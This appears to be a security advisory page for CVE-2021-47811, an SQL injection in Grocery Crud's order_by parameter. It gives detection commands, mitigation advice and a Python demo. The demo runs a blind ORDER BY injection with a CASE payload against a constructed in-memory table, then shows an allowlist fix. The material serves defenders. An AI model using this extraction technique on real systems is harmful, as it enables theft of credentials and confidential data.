grocerycrud
Fixed version
2.0.2
CVE-2021-47811 describes a SQL injection vulnerability in Grocery Crud, a PHP CRUD library, in the order_by parameter of the ajax_list endpoint. The flaw allows remote attackers to alter the ORDER BY clause of the generated database query, potentially leading to data disclosure or unauthorized modification. It affects Grocery Crud versions up to and including 2.0.1; the fix ships in version 2.0.2.
The vulnerability lets an attacker inject arbitrary SQL into a database query. Because the injection point is a sort expression, the classic technique is blind extraction: a conditional expression in ORDER BY changes the row order depending on data the attacker cannot read directly, which is enough to recover credentials, financial records or other confidential data one character at a time. Depending on the database user's privileges and the driver's handling of stacked queries, an attacker may also be able to modify data, cause corruption or denial of service, and in the worst case gain full control of the database and therefore of the application.
CVE-2021-47811 was published on 2026-01-15. Public proof-of-concept exploits are plausible given how straightforward ORDER BY injection is to exploit. Note that the CVSS score of 9.1 (CRITICAL) rates severity, not likelihood: the EPSS estimate on this page (0.02%) is low, and no KEV listing or confirmed exploitation campaign is currently known.
Organizations using Grocery Crud in production environments, particularly those handling sensitive data, are at significant risk. Shared hosting environments where multiple users share the same Grocery Crud installation are especially vulnerable, as an attacker could potentially compromise other users' data through this vulnerability.
• php / web (paths are placeholders; the fixed-string flag is needed because `[]` is otherwise parsed as an unterminated bracket expression):
grep -rF 'order_by[]' /var/www/grocery_crud/
• php / web:
find /var/www/grocery_crud/ -name 'ajax_list.php' -print
• generic web (the -g flag turns off curl's URL globbing, which would otherwise reject the `[]` in the query string):
curl -gI 'http://your-grocery-crud-site.com/ajax_list?order_by[]='  # check for unusual response headers
Exploitation status
EPSS
0.02% (5th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2021-47811 is to upgrade Grocery Crud to version 2.0.2 or later. If upgrading is not immediately feasible, consider a Web Application Firewall (WAF) rule that blocks SQL syntax in the order_by parameter of the ajax_list endpoint. Input validation on order_by is the real fix: ORDER BY cannot take bound parameters in a prepared statement, so the request value must be matched against an allowlist of column names and sort directions defined by the application, and anything else rejected. Monitor application logs for suspicious sort expressions, unusual database errors, or bursts of ajax_list requests that differ only in order_by.
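The following is an added Python illustration, not Grocery Crud's own code, of the two halves of the paragraph above: why a concatenated order_by value is exploitable even though it only controls sorting, and how an allowlist closes the hole. The table, column names (including a hypothetical `secret` column) and sample rows are constructed for the demo and live in an in-memory SQLite database.

```python
# Added illustration of the ORDER BY injection class and its allowlist fix.
# This is not Grocery CRUD code; table, column names and sample rows are constructed.
import sqlite3


def make_db():
    """In-memory SQLite table with constructed rows standing in for app data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "letmein")],
    )
    return db


def vulnerable_list(db, order_by):
    """Flaw class described on the page: the sort expression is concatenated
    straight into the query. Returns the ids in the order the database chose."""
    sql = "SELECT id FROM users ORDER BY " + order_by
    return [row[0] for row in db.execute(sql)]


def probe(db, guess):
    """Attacker's blind probe: a CASE expression makes the row order depend on
    whether the first character of user 1's secret equals `guess`. SQLite sorts
    NULL last under DESC, so a true condition reverses the order."""
    payload = (
        "(CASE WHEN (SELECT substr(secret, 1, 1) FROM users WHERE id = 1) = "
        f"'{guess}' THEN id END) DESC, id ASC"
    )
    return vulnerable_list(db, payload)


def leak_first_char(db, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Recovers the first secret character purely from changes in row order."""
    baseline = vulnerable_list(db, "id ASC")
    for guess in alphabet:
        if probe(db, guess) != baseline:
            return guess
    return None


# Hardened handling: ORDER BY cannot take bound parameters, so the only safe
# approach is to map the request value onto literals the application defines.
ALLOWED_COLUMNS = {"id", "name"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def validate_order_by(order_by):
    """order_by arrives as a list like ['name', 'desc'] (column, direction).
    Returns (column, direction) or raises ValueError; never returns user text."""
    if not isinstance(order_by, (list, tuple)) or not 1 <= len(order_by) <= 2:
        raise ValueError("order_by must be [column] or [column, direction]")
    column = str(order_by[0])
    direction = str(order_by[1]).lower() if len(order_by) == 2 else "asc"
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"order_by rejected: {order_by!r}")
    return column, direction


def safe_list(db, order_by):
    """Same query as vulnerable_list, but built only from allowlisted literals."""
    column, direction = validate_order_by(order_by)
    # Both values are now application-owned literals, not request text.
    sql = f'SELECT id FROM users ORDER BY "{column}" {direction}'
    return [row[0] for row in db.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print("leaked first char via vulnerable sort:", leak_first_char(db))
    print("hardened sort by name desc:", safe_list(db, ["name", "desc"]))
    try:
        safe_list(db, ["(CASE WHEN 1=1 THEN id END) DESC", "asc"])
    except ValueError as exc:
        print("hardened handler rejected payload:", exc)
```

The probe never reads the secret column in the result set; it only observes whether the row order flipped, which is why WAF rules that look for keywords such as UNION or comment sequences tend to miss ORDER BY injection. The allowlist in `validate_order_by` is the point of the fix: the request string is compared against known values and then discarded, so no user-controlled text ever reaches the query.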
Update Grocery Crud to version 2.0.2 or later. That release contains the fix for the SQL injection in the order_by parameter and removes the risk of query manipulation through it.
CVE-2021-47811 is a critical SQL injection vulnerability in the order_by parameter of Grocery Crud's ajax_list endpoint, affecting versions up to and including 2.0.1, that allows attackers to manipulate database queries.
Yes. If you are running Grocery Crud version 2.0.1 or earlier, you are affected by this SQL injection flaw.
Upgrade Grocery Crud to version 2.0.2 or later. Until then, use WAF rules and strict allowlist validation of the order_by parameter as temporary mitigations.
No confirmed exploitation campaigns are currently known and the EPSS estimate is low (0.02%); the CVSS score of 9.1 reflects the severity of a successful attack rather than its likelihood, and SQL injection of this kind is simple to exploit once a target is identified.
Refer to the official Grocery Crud project website or security advisories for the latest information and updates regarding this vulnerability.